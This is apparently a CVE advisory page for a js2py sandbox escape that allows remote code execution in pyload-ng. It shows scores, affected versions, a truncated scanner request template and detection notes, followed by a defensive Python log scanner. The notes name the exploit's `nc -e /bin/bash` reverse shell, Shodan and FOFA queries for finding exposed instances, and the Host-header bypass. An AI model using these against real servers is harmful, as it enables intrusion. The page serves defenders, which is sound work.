cbcvebase.
CVE-2024-28397
published 2024-06-20

CVE-2024-28397: An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.

Priority: P3 · 42 · medium · 5.3 · CVSS 3.1
CVSS vector: AV:L / AC:L / PR:L / UI:N / S:U / C:L / I:L / A:L
Exploit: available
EPSS: 4.55% (90.4th percentile)
Affected

1 range
Vendor              Product     Version range        Fixed in
pyload-ng_project   pyload-ng   0 – 0.5.0b3.dev85

Detection & IOCs (extracted from sources)

url: /flash/addcrypted2
path: /flash/addcrypted2
sigma
id: CVE-2024-28397
info:
  name: pyload-ng js2py - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
http:
- raw:
  - |-
    POST /flash/addcrypted2 HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/x-www-form-urlencoded
    
    package=pkg&crypted=MTIzNA%3D%3D&jk=...

• Exploit targets the /flash/addcrypted2 POST endpoint; detect POST requests to this path from non-localhost sources, especially with a manipulated Host header.
• A successful exploit response contains the string 'Could not decrypt key' with HTTP 500; use this as a confirmation matcher alongside DNS/OOB callback detection.
• Shodan/FOFA/Google queries can identify exposed pyload instances: search for http.html:"pyload", body="pyload", intitle:"pyload", or app="pyLoad".
• The exploit uses `nc -e /bin/bash` for reverse shell delivery; monitor for subprocess spawning from the pyload process with netcat or /bin/bash as child processes.
• The /flash/addcrypted2 endpoint is intended to only accept localhost connections; the bypass relies entirely on Host header manipulation, so perimeter controls that trust the Host header will be ineffective.
• No patch exists for js2py as of the time of writing; version 0.74 (released Nov 6, 2022) is the latest and remains vulnerable.
• Calling js2py.disable_pyimport() does NOT fully sandbox the environment; attackers can still obtain a Python object reference and escape the sandbox via the class hierarchy traversal technique.
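The first, second and fifth notes above, turned into a small log scanner as an added example (not code from the page, the pyload-ng project or the template author): it reads constructed reverse-proxy log records of the form "client method path host status" and flags POSTs to /flash/addcrypted2 that arrive from a non-loopback client, raising the verdict when the Host header claims localhost and the response was the HTTP 500 the notes list as the exploit's signature.

```python
import ipaddress
from typing import Dict, List

# Constructed sample records (not from the original page), one request per
# line: "client method path host status", as a proxy in front of pyload-ng
# might log them.
SAMPLE_LOG = """\
127.0.0.1 POST /flash/addcrypted2 127.0.0.1:8000 200
203.0.113.7 POST /flash/addcrypted2 127.0.0.1:8000 500
203.0.113.7 POST /flash/addcrypted2 pyload.example 200
198.51.100.3 GET /flash/addcrypted2 pyload.example 404
203.0.113.9 POST /login pyload.example 200
"""

WATCHED_PATH = "/flash/addcrypted2"
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

def parse_line(line: str) -> Dict[str, str]:
    client, method, path, host, status = line.split()
    return {"client": client, "method": method, "path": path,
            "host": host, "status": status}

def host_claims_local(host: str) -> bool:
    # Drop an optional ":port" from a hostname or IPv4 literal; a bare
    # IPv6 literal such as "::1" has more than one colon and is kept as-is.
    name = host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    return name.lower() in LOCAL_HOSTS

def classify(rec: Dict[str, str]) -> str:
    """Return 'ok', 'suspect' or 'likely_exploit' for one record."""
    if rec["method"] != "POST" or rec["path"] != WATCHED_PATH:
        return "ok"
    if ipaddress.ip_address(rec["client"]).is_loopback:
        return "ok"  # the endpoint is meant to be used from localhost only
    # A remote client reaching a localhost-only endpoint is always worth a
    # look; a Host header pretending to be localhost plus the HTTP 500
    # response signature is the bypass the notes describe.
    if host_claims_local(rec["host"]) and rec["status"] == "500":
        return "likely_exploit"
    return "suspect"

def scan(log: str) -> List[Dict[str, str]]:
    hits = []
    for line in log.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        verdict = classify(rec)
        if verdict != "ok":
            hits.append({**rec, "verdict": verdict})
    return hits
```

The 'Could not decrypt key' body string from the second note cannot be checked from access logs alone; pair this with a WAF or body-logging rule if you need that confirmation.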

CVSS provenance

nvd (v3.1): 5.3 MEDIUM, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
ghsa: 5.3 MEDIUM
osv: 5.3 MEDIUM